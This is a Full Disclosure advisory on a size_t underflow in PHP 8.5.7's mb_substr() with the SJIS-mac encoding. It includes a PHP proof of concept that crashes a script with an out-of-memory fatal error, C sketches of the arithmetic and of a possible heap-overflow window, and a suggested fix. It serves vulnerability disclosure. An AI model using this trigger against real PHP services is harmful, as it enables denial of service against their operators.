PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow

Full Disclosure mailing list archives


From: Khashayar Fereidani <info () fereidani com>
Date: Fri, 19 Jun 2026 09:53:43 +0330

# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow

**Author:** Khashayar Fereidani
**Disclosure Date:** 2026-06-18
**Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
**Contact:** https://fereidani.com/contact

## Description

The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
deliberately exempts the `SJIS-mac` encoding from its early
empty-string return when `from >= in_len`. Execution therefore falls
through to `mb_get_substr_slow()`, which calls
`mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);`. When
`from > in_len`, the expression `in_len - from` underflows `size_t`.
If `len` is omitted or large, `MIN()` selects the underflowed value and
the initial buffer size is close to 2^64 bytes, so the allocation fails
immediately with an Out-Of-Memory (OOM) fatal error. Furthermore, if
`_ZSTR_STRUCT_SIZE(initsize)` wraps past `SIZE_MAX`, a tiny buffer
could be allocated while the buffer limit is still computed from the
huge value, resulting in a heap buffer overflow when decoded
codepoints are subsequently written.
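
The arithmetic can be checked in isolation. The following is a minimal C sketch, not code from PHP: the helper names are hypothetical, a 64-bit `size_t` is modelled with `uint64_t`, and the 25-byte overhead (a 24-byte `zend_string` header plus one NUL byte) is an assumption about a typical 64-bit build, consistent with the gap between the wrapped difference and the size in the reported error message.

```c
#include <stdint.h>

/* Assumption: _ZSTR_STRUCT_SIZE(n) adds a 24-byte header plus 1 NUL byte
 * on a 64-bit build. */
#define ASSUMED_ZSTR_OVERHEAD 25u

/* Mirrors MIN(len, in_len - from) with no guard (hypothetical helper).
 * Unsigned subtraction wraps modulo 2^64 when from > in_len. */
static uint64_t unguarded_initsize(uint64_t len, uint64_t in_len, uint64_t from)
{
    uint64_t remaining = in_len - from;
    return len < remaining ? len : remaining;
}

/* Size the buffer initializer would then request (hypothetical helper). */
static uint64_t requested_bytes(uint64_t initsize)
{
    return initsize + ASSUMED_ZSTR_OVERHEAD;
}
```

With `in_len = 3`, `from = 1000000` and `len` set to `UINT64_MAX` (length omitted), `unguarded_initsize()` returns 18446744073708551619, and `requested_bytes()` of that value is 18446744073708551644, the figure quoted in the fatal error.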

## Proof of concept

```php
<?php
/*
 * PoC: mb_substr() 'SJIS-mac' size_t underflow
 * File:  ext/mbstring/mbstring.c  mb_get_substr() (~L2129) +
 *        mb_get_substr_slow() (~L2102)
 *
 * mb_get_substr() deliberately skips the early "return empty" guard
 * for SJIS-mac:
 *
 *     if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
 *         return zend_empty_string;     // <-- sjis_mac bypasses this
 *                                       //     when from >= in_len
 *     }
 *
 * ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
 * mb_get_substr_slow(), whose first line is:
 *
 *     mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
 *
 * With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
 * mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
 *
 * Two outcomes, both wrong (correct result is the empty string):
 *  (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
 *      (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
 *  (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
 *      _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
 *      while buf->limit = out + initsize stays wild -> a subsequent write of
 *      decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
 *      needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
 *      from < codepoint_count while from > byte_count. Worth upstream review.)
 */
echo "PHP ", PHP_VERSION, "  sjis_mac available: ",
     (in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";

/* control: a normal encoding with from > strlen returns "" cleanly */
echo "UTF-8, from=10 > strlen('abc'): -> ";
var_dump(@mb_substr("abc", 10, null, "UTF-8"));

/* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
 * The "tried to allocate 18...644 bytes" is (size_t)(3 - 1000000) plus the
 * zend_string overhead added by _ZSTR_STRUCT_SIZE (a 25-byte difference). */
echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
@mb_substr("abc", 1000000, null, "SJIS-mac");
echo "(if you see this line, the call returned without a fatal error)\n";
```
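
Outcome (B) in the PoC comment depends on how far `from` exceeds `in_len`. The C sketch below estimates that window under stated assumptions: the helper names are hypothetical, `size_t` is modelled as 64-bit, `len` is omitted so `MIN()` picks the underflowed value, and the 25-byte `zend_string` overhead is assumed rather than taken from the PHP source. It says nothing about whether the overflow is reachable in practice.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumption: 24-byte zend_string header + 1 NUL byte on a 64-bit build. */
#define ASSUMED_ZSTR_OVERHEAD 25u

/* True when initsize + overhead no longer fits in 64 bits, so the sum wraps
 * (hypothetical helper). */
static bool struct_size_wraps(uint64_t in_len, uint64_t from)
{
    uint64_t initsize = in_len - from;   /* wraps when from > in_len */
    return initsize > UINT64_MAX - ASSUMED_ZSTR_OVERHEAD;
}

/* Size requested after the (possibly wrapped) addition (hypothetical helper). */
static uint64_t wrapped_request(uint64_t in_len, uint64_t from)
{
    return (in_len - from) + ASSUMED_ZSTR_OVERHEAD;
}
```

Under these assumptions the sum wraps only when `from` exceeds `in_len` by 1 to 25 bytes, leaving a request of 0 to 24 bytes. For `in_len = 3`, `from = 4` gives a 24-byte request, while `from = 29` no longer wraps and lands in the OOM case (A).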

## Impact

An attacker who controls the `from` offset passed to `mb_substr()`
with the 'SJIS-mac' encoding can supply `from > in_len` and trigger
the `size_t` underflow. This reliably causes an Out-Of-Memory (OOM)
fatal error that terminates the script, resulting in a Denial of
Service. Under conditions that have not been demonstrated, it might
also cause a heap buffer overflow.

## Solution

Tighten the checks in `mb_get_substr()` and `mb_get_substr_slow()` in
`ext/mbstring/mbstring.c`. The calculation `in_len - from` should be
bounds-checked so that it either returns early or clamps to zero when
`from > in_len`, avoiding the underflow when the string buffer is
initialized.
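
The clamping approach can be sketched in C as follows. This is an illustration of the idea rather than a proposed patch: the helper names are hypothetical, and an actual fix would also need to preserve whatever behavior the SJIS-mac exemption was introduced for.

```c
#include <stddef.h>

/* Bytes left after `from`, clamped to zero instead of wrapping
 * (hypothetical helper). */
static size_t remaining_after(size_t in_len, size_t from)
{
    return from >= in_len ? 0 : in_len - from;
}

/* Guarded counterpart of MIN(len, in_len - from) (hypothetical helper). */
static size_t guarded_initsize(size_t len, size_t in_len, size_t from)
{
    size_t remaining = remaining_after(in_len, from);
    return len < remaining ? len : remaining;
}
```

With this guard, `in_len = 3` and `from = 1000000` yield an initial size of 0 instead of a value near 2^64, and in-range offsets are unaffected.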

Source: https://seclists.org/fulldisclosure/2026/Jun/12